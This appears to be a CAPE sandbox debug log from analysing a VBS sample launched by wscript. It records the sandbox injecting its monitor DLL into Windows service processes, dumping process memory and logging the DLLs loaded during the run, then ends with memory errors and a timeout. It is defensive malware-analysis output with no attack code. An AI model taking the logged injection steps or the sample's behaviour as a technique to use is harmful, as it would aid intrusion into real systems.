2019-09-11 14:38:49,992 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-09-11 14:38:49,992 [root] DEBUG: Process dumps enabled.
2019-09-11 14:38:50,006 [root] INFO: Disabling sleep skipping.
2019-09-11 14:38:50,006 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-09-11 14:38:50,006 [root] DEBUG: DLL unloaded from 0x75B20000.
2019-09-11 14:38:50,006 [root] DEBUG: DLL unloaded from 0x75B20000.
2019-09-11 14:38:50,006 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1052 at 0x747a0000, image base 0x3b0000, stack from 0x286000-0x290000
2019-09-11 14:38:50,053 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Windows\System32\wscript.exe" \B "C:\Users\user\AppData\Roaming\lXYOCrWYMY.vbs".
2019-09-11 14:38:50,101 [root] INFO: Added new process to list with pid: 1052
2019-09-11 14:38:50,101 [root] INFO: Monitor successfully loaded in process with pid 1052.
2019-09-11 14:38:50,163 [root] DEBUG: DLL unloaded from 0x77050000.
2019-09-11 14:38:50,178 [root] DEBUG: DLL unloaded from 0x003B0000.
2019-09-11 14:38:50,178 [root] DEBUG: DLL loaded at 0x74B30000: C:\Windows\SysWOW64\SXS (0x5f000 bytes).
2019-09-11 14:38:50,194 [root] DEBUG: DLL loaded at 0x75670000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-09-11 14:38:50,194 [root] DEBUG: DLL loaded at 0x74730000: C:\Windows\SysWOW64\vbscript (0x6b000 bytes).
2019-09-11 14:38:50,194 [root] DEBUG: DLL unloaded from 0x74730000.
2019-09-11 14:38:50,194 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1052
2019-09-11 14:38:50,194 [root] DEBUG: GetHookCallerBase: thread 1900 (handle 0x0), return address 0x003B2FBD, allocation base 0x003B0000.
2019-09-11 14:38:50,210 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x003B0000.
2019-09-11 14:38:50,210 [root] DEBUG: DLL loaded at 0x752D0000: C:\Windows\syswow64\ws2_32 (0x35000 bytes).
2019-09-11 14:38:50,210 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x003B0000.
2019-09-11 14:38:50,210 [root] DEBUG: DLL loaded at 0x75850000: C:\Windows\syswow64\NSI (0x6000 bytes).
2019-09-11 14:38:50,210 [root] DEBUG: DumpProcess: Module entry point VA is 0x00002F3B.
2019-09-11 14:38:50,210 [root] DEBUG: DLL loaded at 0x74DB0000: C:\Windows\SysWOW64\dnsapi (0x44000 bytes).
2019-09-11 14:38:50,210 [root] DEBUG: DLL loaded at 0x74130000: C:\Windows\SysWOW64\iphlpapi (0x1c000 bytes).
2019-09-11 14:38:50,226 [root] DEBUG: DLL loaded at 0x74120000: C:\Windows\SysWOW64\WINNSI (0x7000 bytes).
2019-09-11 14:38:50,226 [root] DEBUG: DLL loaded at 0x740C0000: C:\Windows\system32\wbem\wbemdisp (0x31000 bytes).
2019-09-11 14:38:50,226 [root] INFO: Added new CAPE file to list with path: C:\QnnyUFjf\CAPE\1052_187475807610191711392019
2019-09-11 14:38:50,226 [root] DEBUG: DLL loaded at 0x74060000: C:\Windows\system32\wbemcomn (0x5c000 bytes).
2019-09-11 14:38:50,226 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x22a00.
2019-09-11 14:38:50,240 [root] DEBUG: DLL unloaded from 0x75700000.
2019-09-11 14:38:50,240 [root] INFO: Notified of termination of process with pid 1052.
2019-09-11 14:38:50,397 [root] DEBUG: DLL loaded at 0x73DE0000: C:\Windows\system32\wbem\wbemprox (0xa000 bytes).
2019-09-11 14:38:50,413 [root] DEBUG: DLL loaded at 0x73DC0000: C:\Windows\system32\wbem\wmiutils (0x17000 bytes).
2019-09-11 14:38:50,427 [root] DEBUG: DLL loaded at 0x73DB0000: C:\Windows\system32\wbem\wbemsvc (0xf000 bytes).
2019-09-11 14:38:50,444 [root] DEBUG: DLL loaded at 0x73BC0000: C:\Windows\system32\wbem\fastprox (0x96000 bytes).
2019-09-11 14:38:50,460 [root] DEBUG: DLL loaded at 0x73E00000: C:\Windows\system32\NTDSAPI (0x18000 bytes).
2019-09-11 14:38:50,647 [root] DEBUG: DLL loaded at 0x74E30000: C:\Windows\system32\NLAapi (0x10000 bytes).
2019-09-11 14:38:50,647 [root] DEBUG: DLL loaded at 0x74E20000: C:\Windows\system32\napinsp (0x10000 bytes).
2019-09-11 14:38:50,647 [root] DEBUG: DLL loaded at 0x74E00000: C:\Windows\system32\pnrpnsp (0x12000 bytes).
2019-09-11 14:38:50,647 [root] DEBUG: DLL loaded at 0x74F00000: C:\Windows\System32\mswsock (0x3c000 bytes).
2019-09-11 14:38:50,647 [root] DEBUG: DLL loaded at 0x74DA0000: C:\Windows\System32\winrnr (0x8000 bytes).
2019-09-11 14:38:50,677 [root] DEBUG: DLL loaded at 0x73D60000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2019-09-11 14:38:50,677 [root] DEBUG: DLL loaded at 0x73D50000: C:\Windows\SysWOW64\rasadhlp (0x6000 bytes).
2019-09-11 14:38:50,709 [root] DEBUG: DLL unloaded from 0x75530000.
2019-09-11 14:38:50,724 [root] DEBUG: DLL loaded at 0x73B60000: C:\Windows\SysWOW64\RASAPI32 (0x52000 bytes).
2019-09-11 14:38:50,724 [root] DEBUG: DLL loaded at 0x73D30000: C:\Windows\SysWOW64\rasman (0x15000 bytes).
2019-09-11 14:38:50,724 [root] DEBUG: DLL unloaded from 0x73B60000.
2019-09-11 14:38:50,740 [root] INFO: Process with pid 1052 has terminated
2019-09-11 14:38:50,740 [root] DEBUG: DLL loaded at 0x73B50000: C:\Windows\SysWOW64\rtutils (0xd000 bytes).
2019-09-11 14:38:50,740 [root] DEBUG: DLL unloaded from 0x73D30000.
2019-09-11 14:38:50,740 [root] DEBUG: DLL unloaded from 0x75370000.
2019-09-11 14:38:50,740 [root] DEBUG: DLL loaded at 0x73B40000: C:\Windows\SysWOW64\sensapi (0x6000 bytes).
2019-09-11 14:38:50,740 [root] DEBUG: DLL unloaded from 0x77050000.
2019-09-11 14:38:50,756 [root] DEBUG: DLL loaded at 0x74EF0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2019-09-11 14:38:50,756 [root] DEBUG: DLL loaded at 0x75520000: C:\Windows\syswow64\Normaliz (0x3000 bytes).
2019-09-11 14:38:50,756 [root] DEBUG: DLL loaded at 0x73B30000: C:\Windows\System32\wship6 (0x6000 bytes).
2019-09-11 14:38:50,772 [root] DEBUG: DLL loaded at 0x73AD0000: C:\Windows\System32\netprofm (0x5a000 bytes).
2019-09-11 14:38:50,802 [root] DEBUG: DLL loaded at 0x73AB0000: C:\Windows\SysWOW64\DHCPCSVC (0x12000 bytes).
2019-09-11 14:38:50,802 [root] DEBUG: DLL loaded at 0x73AA0000: C:\Windows\SysWOW64\dhcpcsvc6 (0xd000 bytes).
2019-09-11 14:38:50,802 [root] DEBUG: DLL unloaded from 0x74130000.
2019-09-11 14:38:50,802 [root] DEBUG: DLL unloaded from 0x73AB0000.
2019-09-11 14:38:53,095 [root] DEBUG: DLL unloaded from 0x75370000.
2019-09-11 14:38:57,542 [root] INFO: Stopped WMI Service
2019-09-11 14:38:57,542 [root] INFO: Attaching to DcomLaunch service (pid 568)
2019-09-11 14:38:57,558 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-09-11 14:38:57,558 [lib.api.process] INFO: 64-bit DLL to inject is C:\ttdrm\dll\yLBkhzxK.dll, loader C:\ttdrm\bin\iqYnpnCg.exe
2019-09-11 14:38:57,558 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\ooRSXWph.
2019-09-11 14:38:57,558 [root] DEBUG: Loader: Injecting process 568 (thread 0) with C:\ttdrm\dll\yLBkhzxK.dll.
2019-09-11 14:38:57,558 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 572, handle 0x84
2019-09-11 14:38:57,558 [root] DEBUG: Process image base: 0x00000000FF8E0000
2019-09-11 14:38:57,558 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2019-09-11 14:38:57,558 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2019-09-11 14:38:57,572 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-09-11 14:38:57,572 [root] DEBUG: Process dumps enabled.
2019-09-11 14:38:57,572 [root] INFO: Disabling sleep skipping.
2019-09-11 14:38:57,635 [root] WARNING: Unable to place hook on LockResource
2019-09-11 14:38:57,635 [root] WARNING: Unable to hook LockResource
2019-09-11 14:38:57,667 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 568 at 0x00000000739C0000, image base 0x00000000FF8E0000, stack from 0x0000000001746000-0x0000000001750000
2019-09-11 14:38:57,667 [root] DEBUG: Commandline: C:\Windows\sysnative\svchost.exe -k DcomLaunch.
2019-09-11 14:38:57,667 [root] INFO: Added new process to list with pid: 568
2019-09-11 14:38:57,667 [root] INFO: Monitor successfully loaded in process with pid 568.
2019-09-11 14:38:57,667 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-09-11 14:38:57,667 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-09-11 14:38:57,667 [root] DEBUG: Successfully injected DLL C:\ttdrm\dll\yLBkhzxK.dll.
2019-09-11 14:39:01,801 [root] INFO: Started WMI Service
2019-09-11 14:39:01,894 [root] INFO: Attaching to WMI service (pid 3016)
2019-09-11 14:39:01,894 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-09-11 14:39:01,894 [lib.api.process] INFO: 64-bit DLL to inject is C:\ttdrm\dll\yLBkhzxK.dll, loader C:\ttdrm\bin\iqYnpnCg.exe
2019-09-11 14:39:01,894 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\ooRSXWph.
2019-09-11 14:39:01,894 [root] DEBUG: Loader: Injecting process 3016 (thread 0) with C:\ttdrm\dll\yLBkhzxK.dll.
2019-09-11 14:39:01,957 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 2152, handle 0x84
2019-09-11 14:39:02,019 [root] DEBUG: Process image base: 0x00000000FF8E0000
2019-09-11 14:39:02,082 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2019-09-11 14:39:02,112 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2019-09-11 14:39:02,128 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-09-11 14:39:02,128 [root] DEBUG: Process dumps enabled.
2019-09-11 14:39:02,160 [root] INFO: Disabling sleep skipping.
2019-09-11 14:39:02,160 [root] WARNING: Unable to place hook on LockResource
2019-09-11 14:39:02,221 [root] WARNING: Unable to hook LockResource
2019-09-11 14:39:02,299 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 3016 at 0x00000000739C0000, image base 0x00000000FF8E0000, stack from 0x00000000015D6000-0x00000000015E0000
2019-09-11 14:39:02,299 [root] DEBUG: Commandline: C:\Windows\sysnative\svchost.exe -k netsvcs.
2019-09-11 14:39:02,299 [root] INFO: Added new process to list with pid: 3016
2019-09-11 14:39:02,299 [root] INFO: Monitor successfully loaded in process with pid 3016.
2019-09-11 14:39:02,361 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-09-11 14:39:02,361 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-09-11 14:39:02,361 [root] DEBUG: Successfully injected DLL C:\ttdrm\dll\yLBkhzxK.dll.
2019-09-11 14:39:04,467 [root] DEBUG: DLL loaded at 0x73DE0000: C:\Windows\system32\wbem\wbemprox (0xa000 bytes).
2019-09-11 14:39:04,530 [root] DEBUG: DLL loaded at 0x73DC0000: C:\Windows\system32\wbem\wmiutils (0x17000 bytes).
2019-09-11 14:39:04,640 [root] DEBUG: DLL loaded at 0x000007FEFA3E0000: C:\Windows\system32\VSSAPI (0x1b0000 bytes).
2019-09-11 14:39:04,655 [root] DEBUG: DLL loaded at 0x000007FEFB3B0000: C:\Windows\system32\ATL (0x19000 bytes).
2019-09-11 14:39:04,655 [root] DEBUG: DLL loaded at 0x000007FEFA3A0000: C:\Windows\system32\VssTrace (0x17000 bytes).
2019-09-11 14:39:04,967 [root] DEBUG: DLL loaded at 0x000007FEFAA30000: C:\Windows\system32\samcli (0x14000 bytes).
2019-09-11 14:39:04,967 [root] DEBUG: DLL loaded at 0x000007FEFBA90000: C:\Windows\system32\SAMLIB (0x1d000 bytes).
2019-09-11 14:39:04,983 [root] DEBUG: DLL loaded at 0x000007FEFAE90000: C:\Windows\system32\netutils (0xc000 bytes).
2019-09-11 14:39:05,013 [root] DEBUG: DLL loaded at 0x000007FEFB340000: C:\Windows\system32\es (0x67000 bytes).
2019-09-11 14:39:05,217 [root] DEBUG: DLL loaded at 0x000007FEFBAE0000: C:\Windows\system32\PROPSYS (0x12c000 bytes).
2019-09-11 14:39:05,513 [root] DEBUG: DLL loaded at 0x000007FEF9840000: C:\Windows\system32\wbem\wbemcore (0x12f000 bytes).
2019-09-11 14:39:05,513 [root] DEBUG: DLL loaded at 0x000007FEF97D0000: C:\Windows\system32\wbem\esscli (0x6f000 bytes).
2019-09-11 14:39:05,513 [root] DEBUG: DLL loaded at 0x000007FEF9C60000: C:\Windows\system32\wbem\FastProx (0xe2000 bytes).
2019-09-11 14:39:05,513 [root] DEBUG: DLL loaded at 0x000007FEF9BE0000: C:\Windows\system32\NTDSAPI (0x27000 bytes).
2019-09-11 14:39:05,529 [root] DEBUG: DLL unloaded from 0x000007FEF9840000.
2019-09-11 14:39:05,575 [root] DEBUG: DLL loaded at 0x000007FEF96B0000: C:\Windows\system32\wbem\wbemsvc (0x14000 bytes).
2019-09-11 14:39:05,716 [root] DEBUG: DLL loaded at 0x73DB0000: C:\Windows\system32\wbem\wbemsvc (0xf000 bytes).
2019-09-11 14:39:05,779 [root] DEBUG: DLL loaded at 0x73BC0000: C:\Windows\system32\wbem\fastprox (0x96000 bytes).
2019-09-11 14:39:05,779 [root] DEBUG: DLL loaded at 0x73E00000: C:\Windows\system32\NTDSAPI (0x18000 bytes).
2019-09-11 14:39:05,779 [root] DEBUG: DLL loaded at 0x000007FEFCD30000: C:\Windows\system32\authZ (0x2f000 bytes).
2019-09-11 14:39:05,793 [root] DEBUG: DLL loaded at 0x000007FEFA5B0000: C:\Windows\system32\wbem\wmiutils (0x26000 bytes).
2019-09-11 14:39:05,841 [root] DEBUG: DLL loaded at 0x000007FEF99A0000: C:\Windows\system32\wbem\repdrvfs (0x73000 bytes).
2019-09-11 14:39:05,841 [root] WARNING: File at path "C:\Windows\sysnative\wbem\repository\WRITABLE.TST" does not exist, skip.
2019-09-11 14:39:05,857 [root] DEBUG: DLL loaded at 0x000007FEFCD70000: C:\Windows\system32\Wevtapi (0x6d000 bytes).
2019-09-11 14:39:05,918 [root] DEBUG: DLL unloaded from 0x000007FEFCD70000.
2019-09-11 14:39:06,325 [root] DEBUG: DLL loaded at 0x000007FEF8380000: C:\Windows\system32\wbem\wmiprvsd (0xbc000 bytes).
2019-09-11 14:39:06,339 [root] DEBUG: DLL loaded at 0x000007FEF8360000: C:\Windows\system32\NCObjAPI (0x16000 bytes).
2019-09-11 14:39:06,746 [root] DEBUG: DLL loaded at 0x000007FEF7770000: C:\Windows\system32\wbem\wbemess (0x7e000 bytes).
2019-09-11 14:39:06,901 [root] DEBUG: DLL unloaded from 0x0000000077260000.
2019-09-11 14:39:07,651 [root] DEBUG: DLL loaded at 0x000007FEFA200000: C:\Windows\system32\wbem\ncprov (0x16000 bytes).
2019-09-11 14:39:07,790 [root] INFO: Announced 64-bit process name: WmiPrvSE.exe pid: 2444
2019-09-11 14:39:07,790 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-09-11 14:39:07,790 [lib.api.process] INFO: 64-bit DLL to inject is C:\ttdrm\dll\yLBkhzxK.dll, loader C:\ttdrm\bin\iqYnpnCg.exe
2019-09-11 14:39:07,838 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\ooRSXWph.
2019-09-11 14:39:07,838 [root] DEBUG: Loader: Injecting process 2444 (thread 2588) with C:\ttdrm\dll\yLBkhzxK.dll.
2019-09-11 14:39:07,900 [root] DEBUG: Process image base: 0x00000000FF330000
2019-09-11 14:39:07,900 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ttdrm\dll\yLBkhzxK.dll.
2019-09-11 14:39:07,900 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FF38F000 - 0x000007FEFF6A0000
2019-09-11 14:39:07,900 [root] DEBUG: InjectDllViaIAT: Allocated 0x234 bytes for new import table at 0x00000000FF390000.
2019-09-11 14:39:07,963 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-09-11 14:39:07,963 [root] DEBUG: Successfully injected DLL C:\ttdrm\dll\yLBkhzxK.dll.
2019-09-11 14:39:07,977 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2444
2019-09-11 14:39:07,977 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-09-11 14:39:07,977 [root] DEBUG: Process dumps enabled.
2019-09-11 14:39:08,072 [root] INFO: Disabling sleep skipping.
2019-09-11 14:39:08,102 [root] WARNING: Unable to place hook on LockResource
2019-09-11 14:39:08,118 [root] WARNING: Unable to hook LockResource
2019-09-11 14:39:08,150 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-09-11 14:39:08,165 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 2444 at 0x00000000739C0000, image base 0x00000000FF330000, stack from 0x00000000001E0000-0x00000000001F0000
2019-09-11 14:39:08,211 [root] DEBUG: Commandline: C:\Windows\sysnative\wbem\wmiprvse.exe -secured -Embedding.
2019-09-11 14:39:08,211 [root] INFO: Added new process to list with pid: 2444
2019-09-11 14:39:08,211 [root] INFO: Monitor successfully loaded in process with pid 2444.
2019-09-11 14:39:08,336 [root] DEBUG: DLL loaded at 0x000007FEFD1C0000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-09-11 14:39:08,336 [root] DEBUG: DLL loaded at 0x000007FEFC400000: C:\Windows\system32\ntmarta (0x2d000 bytes).
2019-09-11 14:39:08,336 [root] DEBUG: DLL loaded at 0x000007FEFE1F0000: C:\Windows\system32\WLDAP32 (0x52000 bytes).
2019-09-11 14:39:08,930 [root] DEBUG: DLL loaded at 0x000007FEFE640000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-09-11 14:39:08,992 [root] DEBUG: DLL loaded at 0x000007FEFA1D0000: C:\Windows\system32\wbem\wbemprox (0xf000 bytes).
2019-09-11 14:39:09,101 [root] DEBUG: DLL loaded at 0x000007FEFCB60000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2019-09-11 14:39:09,148 [root] DEBUG: DLL loaded at 0x000007FEFC860000: C:\Windows\system32\rsaenh (0x47000 bytes).
2019-09-11 14:39:09,194 [root] DEBUG: DLL loaded at 0x000007FEFD270000: C:\Windows\system32\RpcRtRemote (0x14000 bytes).
2019-09-11 14:39:10,052 [root] DEBUG: DLL loaded at 0x000007FEF96B0000: C:\Windows\system32\wbem\wbemsvc (0x14000 bytes).
2019-09-11 14:39:10,598 [root] DEBUG: DLL loaded at 0x000007FEFA5B0000: C:\Windows\system32\wbem\wmiutils (0x26000 bytes).
2019-09-11 14:39:14,280 [root] DEBUG: DLL unloaded from 0x75530000.
2019-09-11 14:39:19,538 [root] DEBUG: DLL unloaded from 0x74B20000.
2019-09-11 14:39:19,599 [root] DEBUG: DLL unloaded from 0x74B00000.
2019-09-11 14:39:19,694 [root] DEBUG: DLL unloaded from 0x74B20000.
2019-09-11 14:39:19,710 [root] DEBUG: DLL unloaded from 0x74B00000.
2019-09-11 14:39:19,710 [root] DEBUG: DLL unloaded from 0x76790000.
2019-09-11 14:39:19,710 [root] DEBUG: DLL unloaded from 0x76790000.
2019-09-11 14:39:23,921 [root] DEBUG: DLL unloaded from 0x000007FEF9840000.
2019-09-11 14:39:24,404 [root] DEBUG: DLL loaded at 0x000007FEF3560000: C:\Windows\system32\wbem\cimwin32 (0x1fa000 bytes).
2019-09-11 14:39:24,421 [root] DEBUG: DLL loaded at 0x000007FEF3E10000: C:\Windows\system32\framedynos (0x4c000 bytes).
2019-09-11 14:39:24,421 [root] DEBUG: DLL loaded at 0x000007FEFB2A0000: C:\Windows\system32\WTSAPI32 (0x11000 bytes).
2019-09-11 14:39:27,634 [root] DEBUG: DLL loaded at 0x000007FEFBAC0000: C:\Windows\System32\dskquota (0x20000 bytes).
2019-09-11 14:39:27,650 [root] DEBUG: DLL loaded at 0x000007FEFAA30000: C:\Windows\system32\SAMCLI (0x14000 bytes).
2019-09-11 14:39:27,697 [root] DEBUG: DLL loaded at 0x000007FEFAE70000: C:\Windows\system32\WKSCLI (0x15000 bytes).
2019-09-11 14:39:27,743 [root] DEBUG: DLL loaded at 0x000007FEFAEA0000: C:\Windows\System32\NETAPI32 (0x16000 bytes).
2019-09-11 14:39:27,789 [root] DEBUG: DLL loaded at 0x000007FEFAE90000: C:\Windows\System32\netutils (0xc000 bytes).
2019-09-11 14:39:27,852 [root] DEBUG: DLL loaded at 0x000007FEFCDE0000: C:\Windows\System32\srvcli (0x23000 bytes).
2019-09-11 14:39:27,884 [root] DEBUG: DLL loaded at 0x000007FEFC950000: C:\Windows\system32\LOGONCLI (0x30000 bytes).
2019-09-11 14:39:27,914 [root] DEBUG: DLL loaded at 0x000007FEFCF60000: C:\Windows\System32\Secur32 (0xb000 bytes).
2019-09-11 14:39:27,946 [root] DEBUG: DLL loaded at 0x000007FEFE710000: C:\Windows\system32\SHELL32 (0xd88000 bytes).
2019-09-11 14:39:27,961 [root] DEBUG: DLL unloaded from 0x000007FEFBAC0000.
2019-09-11 14:39:27,993 [root] WARNING: Unable to access file at path "C:": [Errno 13] Permission denied: u'C:'
2019-09-11 14:39:28,009 [root] WARNING: Unable to access file at path "C:": [Errno 13] Permission denied: u'C:'
2019-09-11 14:39:30,614 [root] DEBUG: DLL unloaded from 0x0000000077260000.
2019-09-11 14:39:39,334 [root] DEBUG: DLL unloaded from 0x75370000.
2019-09-11 14:39:41,049 [root] DEBUG: DLL loaded at 0x000007FEFAC10000: C:\Windows\system32\WINBRAND (0x8000 bytes).
2019-09-11 14:39:48,740 [root] DEBUG: DLL loaded at 0x0000000074B20000: C:\Windows\system32\SECURITY (0x3000 bytes).
2019-09-11 14:39:48,756 [root] DEBUG: DLL loaded at 0x000007FEFC760000: C:\Windows\system32\credssp (0xa000 bytes).
2019-09-11 14:39:48,788 [root] DEBUG: DLL unloaded from 0x000007FEFCB60000.
2019-09-11 14:39:48,788 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\schannel (0x57000 bytes).
2019-09-11 14:39:48,803 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\CRYPT32 (0x167000 bytes).
2019-09-11 14:39:48,803 [root] DEBUG: DLL loaded at 0x000007FEFD370000: C:\Windows\system32\MSASN1 (0xf000 bytes).
2019-09-11 14:39:58,242 [root] DEBUG: DLL unloaded from 0x76A70000.
2019-09-11 14:39:58,911 [root] DEBUG: DLL unloaded from 0x0000000074B20000.
2019-09-11 14:39:59,769 [root] DEBUG: DLL loaded at 0x000007FEFA9C0000: C:\Windows\system32\BROWCLI (0x12000 bytes).
2019-09-11 14:39:59,864 [root] DEBUG: DLL loaded at 0x000007FEFA9B0000: C:\Windows\system32\SCHEDCLI (0xa000 bytes).
2019-09-11 14:39:59,911 [root] DEBUG: DLL unloaded from 0x76A70000.
2019-09-11 14:39:59,989 [root] DEBUG: DLL loaded at 0x000007FEFB330000: C:\Windows\system32\DSROLE (0xc000 bytes).
2019-09-11 14:40:00,036 [root] DEBUG: DLL loaded at 0x000007FEF8EC0000: C:\Windows\system32\cscapi (0xf000 bytes).
2019-09-11 14:40:00,269 [root] DEBUG: DLL unloaded from 0x0000000077380000.
2019-09-11 14:40:04,684 [root] DEBUG: DLL loaded at 0x0000000074B10000: C:\Windows\system32\SECURITY (0x3000 bytes).
2019-09-11 14:40:11,127 [root] DEBUG: DLL unloaded from 0x0000000077260000.
2019-09-11 14:40:11,174 [root] DEBUG: DLL unloaded from 0x000007FEFAEA0000.
2019-09-11 14:40:17,788 [root] DEBUG: DLL loaded at 0x74E30000: C:\Windows\system32\NLAapi (0x10000 bytes).
2019-09-11 14:40:17,865 [root] DEBUG: DLL loaded at 0x74E20000: C:\Windows\system32\napinsp (0x10000 bytes).
2019-09-11 14:40:17,976 [root] DEBUG: DLL loaded at 0x74E00000: C:\Windows\system32\pnrpnsp (0x12000 bytes).
2019-09-11 14:40:18,085 [root] DEBUG: DLL loaded at 0x74F00000: C:\Windows\System32\mswsock (0x3c000 bytes).
2019-09-11 14:40:18,177 [root] DEBUG: DLL loaded at 0x74DA0000: C:\Windows\System32\winrnr (0x8000 bytes).
2019-09-11 14:40:18,490 [root] DEBUG: DLL loaded at 0x73D60000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2019-09-11 14:40:19,114 [root] DEBUG: DLL loaded at 0x73D50000: C:\Windows\SysWOW64\rasadhlp (0x6000 bytes).
2019-09-11 14:40:22,109 [root] DEBUG: DLL unloaded from 0x75530000.
2019-09-11 14:40:22,125 [root] DEBUG: DLL loaded at 0x73B60000: C:\Windows\SysWOW64\RASAPI32 (0x52000 bytes).
2019-09-11 14:40:22,155 [root] DEBUG: DLL loaded at 0x73D30000: C:\Windows\SysWOW64\rasman (0x15000 bytes).
2019-09-11 14:40:22,155 [root] DEBUG: DLL loaded at 0x73B50000: C:\Windows\SysWOW64\rtutils (0xd000 bytes).
2019-09-11 14:40:22,155 [root] DEBUG: DLL unloaded from 0x73B60000.
2019-09-11 14:40:22,155 [root] DEBUG: DLL loaded at 0x73B40000: C:\Windows\SysWOW64\sensapi (0x6000 bytes).
2019-09-11 14:40:22,203 [root] DEBUG: DLL unloaded from 0x73D30000.
2019-09-11 14:40:22,203 [root] DEBUG: DLL unloaded from 0x75370000.
2019-09-11 14:40:22,203 [root] DEBUG: DLL unloaded from 0x77050000.
2019-09-11 14:40:22,250 [root] DEBUG: DLL unloaded from 0x73D30000.
2019-09-11 14:40:22,250 [root] DEBUG: DLL unloaded from 0x73D30000.
2019-09-11 14:40:22,266 [root] DEBUG: DLL loaded at 0x75520000: C:\Windows\syswow64\Normaliz (0x3000 bytes).
2019-09-11 14:40:22,375 [root] DEBUG: DLL loaded at 0x73B30000: C:\Windows\System32\wship6 (0x6000 bytes).
2019-09-11 14:40:24,059 [root] DEBUG: DLL unloaded from 0x75530000.
2019-09-11 14:40:29,799 [root] DEBUG: DLL unloaded from 0x0000000074B10000.
2019-09-11 14:40:32,546 [root] DEBUG: DLL unloaded from 0x75370000.
2019-09-11 14:40:39,878 [root] DEBUG: DLL unloaded from 0x0000000077380000.
2019-09-11 14:40:39,908 [root] DEBUG: DLL unloaded from 0x0000000077260000.
2019-09-11 14:40:39,956 [root] DEBUG: DLL unloaded from 0x000007FEFAEA0000.
2019-09-11 14:40:39,971 [root] WARNING: Unable to access file at path "C:": [Errno 13] Permission denied: u'C:'
2019-09-11 14:40:42,421 [root] DEBUG: DLL loaded at 0x0000000074B20000: C:\Windows\system32\SECURITY (0x3000 bytes).
2019-09-11 14:40:42,576 [root] DEBUG: DLL unloaded from 0x75530000.
2019-09-11 14:40:53,668 [root] DEBUG: DLL unloaded from 0x0000000074B20000.
2019-09-11 14:40:53,668 [root] DEBUG: DLL unloaded from 0x0000000077380000.
2019-09-11 14:40:53,684 [root] DEBUG: DLL unloaded from 0x0000000077260000.
2019-09-11 14:41:03,839 [root] DEBUG: DLL unloaded from 0x000007FEFAEA0000.
2019-09-11 14:41:03,871 [root] DEBUG: DLL loaded at 0x0000000074D90000: C:\Windows\system32\SECURITY (0x3000 bytes).
2019-09-11 14:41:03,871 [root] WARNING: Unable to access file at path "C:": [Errno 13] Permission denied: u'C:'
2019-09-11 14:41:07,474 [root] DEBUG: DLL unloaded from 0x75370000.
2019-09-11 14:41:08,161 [root] DEBUG: DLL unloaded from 0x75530000.
2019-09-11 14:41:08,239 [root] ERROR: Traceback (most recent call last):
  File "C:\ttdrm\lib\core\log.py", line 79, in run
    self.handle_logs()
  File "C:\ttdrm\lib\core\log.py", line 61, in handle_logs
    data += buf.raw[:bytes_read.value]
MemoryError
Traceback (most recent call last):
  File "C:\ttdrm\lib\core\log.py", line 79, in run
    self.handle_logs()
  File "C:\ttdrm\lib\core\log.py", line 61, in handle_logs
    data += buf.raw[:bytes_read.value]
MemoryError
2019-09-11 14:41:08,316 [root] ERROR: Traceback (most recent call last):
  File "C:\ttdrm\lib\core\log.py", line 79, in run
    self.handle_logs()
  File "C:\ttdrm\lib\core\log.py", line 61, in handle_logs
    data += buf.raw[:bytes_read.value]
MemoryError
Traceback (most recent call last):
  File "C:\ttdrm\lib\core\log.py", line 79, in run
    self.handle_logs()
  File "C:\ttdrm\lib\core\log.py", line 61, in handle_logs
    data += buf.raw[:bytes_read.value]
MemoryError
2019-09-11 14:41:13,980 [modules.auxiliary.human] INFO: Found button "OK", clicking it
2019-09-11 14:41:28,223 [root] DEBUG: DLL unloaded from 0x75370000.
2019-09-11 14:41:34,181 [root] DEBUG: DLL unloaded from 0x76A70000.
2019-09-11 14:41:56,115 [root] DEBUG: DLL unloaded from 0x76A70000.
2019-09-11 14:42:13,852 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-09-11 14:42:13,852 [root] INFO: Created shutdown mutex.
2019-09-11 14:42:14,867 [lib.api.process] INFO: Successfully received reply to terminate_event, pid 3012
